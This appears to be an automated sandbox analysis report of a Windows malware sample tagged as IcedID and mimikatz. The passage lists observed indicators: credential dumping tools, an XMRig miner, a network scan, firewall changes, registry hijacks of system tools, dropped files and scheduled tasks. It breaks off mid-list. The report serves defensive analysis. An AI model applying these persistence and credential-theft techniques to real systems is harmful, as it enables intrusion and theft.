Analysis
-
max time kernel
167s -
max time network
171s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07-04-2024 23:43
Behavioral task
behavioral1
Sample
2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe
-
Size
10.9MB
-
MD5
74429f8c9da8be6404d2f4b0b33f4933
-
SHA1
a3d68cd45790386de081d284ed9bcbfe6699b059
-
SHA256
7505d18e61a360038b338c802a396fe1529a6e5d6242da427e6725a473e25ad9
-
SHA512
97fe4adcc81629cf7c365d4d82f22405985755e4841440ef47891fb278cc241ccf86fe917b56b635ab5c45ad7b599f5d619e2b2f64aa14c932c287109c2aed45
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
tlmneit.exedescription pid process target process PID 4784 created 1732 4784 tlmneit.exe spoolsv.exe -
Contacts a large (26169) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1096-136-0x00007FF70A910000-0x00007FF70A9FE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 40 IoCs
Processes:
resource yara_rule behavioral2/memory/4472-0-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX C:\Windows\lqtiqntg\tlmneit.exe UPX behavioral2/memory/372-7-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX behavioral2/memory/1096-134-0x00007FF70A910000-0x00007FF70A9FE000-memory.dmp UPX C:\Windows\mqgbuygyl\Corporate\vfshost.exe UPX behavioral2/memory/1096-136-0x00007FF70A910000-0x00007FF70A9FE000-memory.dmp UPX C:\Windows\Temp\mqgbuygyl\uqgqrabii.exe UPX behavioral2/memory/372-140-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/372-143-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX C:\Windows\Temp\cnzhtbqil\bubuee.exe UPX behavioral2/memory/4288-147-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/2164-156-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4960-174-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4288-176-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/2328-179-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4288-182-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/3472-185-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/2584-189-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4288-192-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/3796-194-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/1768-198-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4896-202-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4288-205-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/4924-207-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4360-211-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4288-213-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/3308-216-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/372-224-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4288-226-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/3396-229-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/1632-232-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/2684-234-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4288-245-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/5384-247-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/3880-249-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp UPX behavioral2/memory/4288-250-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/4288-251-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/4288-253-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/4288-255-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX behavioral2/memory/4288-257-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/4288-176-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-182-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-192-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-205-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-213-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-226-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-245-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-250-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-251-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-253-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-255-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig behavioral2/memory/4288-257-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4472-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz C:\Windows\lqtiqntg\tlmneit.exe mimikatz behavioral2/memory/372-7-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/1096-136-0x00007FF70A910000-0x00007FF70A9FE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
tlmneit.exewpcap.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts tlmneit.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts tlmneit.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 3708 netsh.exe 3228 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
tlmneit.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tlmneit.exe -
Executes dropped EXE 29 IoCs
Processes:
tlmneit.exetlmneit.exewpcap.exegbybqbhgt.exevfshost.exeuqgqrabii.exebubuee.exeuqgqrabii.exexohudmc.exehmhriy.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exetlmneit.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exellnysaisr.exeuqgqrabii.exeuqgqrabii.exetlmneit.exepid process 372 tlmneit.exe 4784 tlmneit.exe 4660 wpcap.exe 1200 gbybqbhgt.exe 1096 vfshost.exe 372 uqgqrabii.exe 4288 bubuee.exe 2164 uqgqrabii.exe 4236 xohudmc.exe 3384 hmhriy.exe 4960 uqgqrabii.exe 2328 uqgqrabii.exe 3472 uqgqrabii.exe 2584 uqgqrabii.exe 3796 uqgqrabii.exe 1768 uqgqrabii.exe 4896 uqgqrabii.exe 4924 uqgqrabii.exe 4360 uqgqrabii.exe 3308 uqgqrabii.exe 440 tlmneit.exe 372 uqgqrabii.exe 3396 uqgqrabii.exe 1632 uqgqrabii.exe 2684 uqgqrabii.exe 1072 llnysaisr.exe 5384 uqgqrabii.exe 3880 uqgqrabii.exe 5544 tlmneit.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exegbybqbhgt.exepid process 4660 wpcap.exe 4660 wpcap.exe 4660 wpcap.exe 4660 wpcap.exe 4660 wpcap.exe 4660 wpcap.exe 4660 wpcap.exe 4660 wpcap.exe 4660 wpcap.exe 1200 gbybqbhgt.exe 1200 gbybqbhgt.exe 1200 gbybqbhgt.exe -
Processes:
resource yara_rule behavioral2/memory/1096-134-0x00007FF70A910000-0x00007FF70A9FE000-memory.dmp upx C:\Windows\mqgbuygyl\Corporate\vfshost.exe upx behavioral2/memory/1096-136-0x00007FF70A910000-0x00007FF70A9FE000-memory.dmp upx C:\Windows\Temp\mqgbuygyl\uqgqrabii.exe upx behavioral2/memory/372-140-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/372-143-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx C:\Windows\Temp\cnzhtbqil\bubuee.exe upx behavioral2/memory/4288-147-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/2164-156-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4960-174-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4288-176-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/2328-179-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4288-182-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/3472-185-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/2584-189-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4288-192-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/3796-194-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/1768-198-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4896-202-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4288-205-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/4924-207-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4360-211-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4288-213-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/3308-216-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/372-224-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4288-226-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/3396-229-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/1632-232-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/2684-234-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4288-245-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/5384-247-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/3880-249-0x00007FF7D97F0000-0x00007FF7D984B000-memory.dmp upx behavioral2/memory/4288-250-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/4288-251-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/4288-253-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/4288-255-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx behavioral2/memory/4288-257-0x00007FF6F7A80000-0x00007FF6F7BA0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 82 ifconfig.me 81 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
tlmneit.exewpcap.exexohudmc.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft tlmneit.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache tlmneit.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\hmhriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tlmneit.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A tlmneit.exe File created C:\Windows\SysWOW64\hmhriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tlmneit.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tlmneit.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 tlmneit.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content tlmneit.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 tlmneit.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A tlmneit.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData tlmneit.exe -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
tlmneit.exe2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.execmd.exellnysaisr.exedescription ioc process File created C:\Windows\mqgbuygyl\UnattendGC\specials\coli-0.dll tlmneit.exe File opened for modification C:\Windows\lqtiqntg\tlmneit.exe 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\schoedcl.xml tlmneit.exe File created C:\Windows\lqtiqntg\svschost.xml tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\trch-1.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\vimpcsvc.xml tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\vimpcsvc.xml tlmneit.exe File created C:\Windows\lqtiqntg\vimpcsvc.xml tlmneit.exe File opened for modification C:\Windows\mqgbuygyl\thanliysa\Packet.dll tlmneit.exe File created C:\Windows\lqtiqntg\docmicfg.xml tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\exma-1.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\tibe-2.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\xdvl-0.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\schoedcl.exe tlmneit.exe File created C:\Windows\mqgbuygyl\upbdrjv\swrpwe.exe tlmneit.exe File created C:\Windows\mqgbuygyl\thanliysa\llnysaisr.exe tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\spoolsrv.xml tlmneit.exe File created C:\Windows\lqtiqntg\schoedcl.xml tlmneit.exe File opened for modification C:\Windows\mqgbuygyl\Corporate\log.txt cmd.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\trfo-2.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\AppCapture32.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\crli-0.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\svschost.exe tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\svschost.xml tlmneit.exe File opened for modification C:\Windows\lqtiqntg\vimpcsvc.xml tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\cnli-1.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\posh-0.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\schoedcl.xml tlmneit.exe File created C:\Windows\mqgbuygyl\thanliysa\ip.txt tlmneit.exe File created C:\Windows\mqgbuygyl\thanliysa\wpcap.exe tlmneit.exe File opened for modification C:\Windows\lqtiqntg\schoedcl.xml tlmneit.exe File created C:\Windows\lqtiqntg\spoolsrv.xml tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\Shellcode.ini tlmneit.exe File created C:\Windows\ime\tlmneit.exe tlmneit.exe File created C:\Windows\mqgbuygyl\thanliysa\scan.bat tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\libeay32.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\ssleay32.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\ucl.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\svschost.xml tlmneit.exe File opened for modification C:\Windows\lqtiqntg\docmicfg.xml tlmneit.exe File created C:\Windows\mqgbuygyl\Corporate\vfshost.exe tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\libxml2.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\zlib1.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\vimpcsvc.exe tlmneit.exe File opened for modification C:\Windows\mqgbuygyl\thanliysa\Result.txt llnysaisr.exe File created C:\Windows\mqgbuygyl\UnattendGC\AppCapture64.dll tlmneit.exe File created C:\Windows\lqtiqntg\tlmneit.exe 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe File created C:\Windows\mqgbuygyl\thanliysa\wpcap.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\docmicfg.exe tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\docmicfg.xml tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\docmicfg.xml tlmneit.exe File opened for modification C:\Windows\lqtiqntg\svschost.xml tlmneit.exe File opened for modification C:\Windows\lqtiqntg\spoolsrv.xml tlmneit.exe File created C:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exe tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\spoolsrv.exe tlmneit.exe File created C:\Windows\mqgbuygyl\Corporate\mimidrv.sys tlmneit.exe File created C:\Windows\mqgbuygyl\Corporate\mimilib.dll tlmneit.exe File created C:\Windows\mqgbuygyl\thanliysa\Packet.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\specials\tucl-1.dll tlmneit.exe File created C:\Windows\mqgbuygyl\UnattendGC\spoolsrv.xml tlmneit.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 1576 sc.exe 2304 sc.exe 4068 sc.exe 3996 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\lqtiqntg\tlmneit.exe nsis_installer_2 C:\Windows\mqgbuygyl\thanliysa\wpcap.exe nsis_installer_1 C:\Windows\mqgbuygyl\thanliysa\wpcap.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 4920 schtasks.exe 2160 schtasks.exe 1556 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
Processes:
uqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exetlmneit.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Key 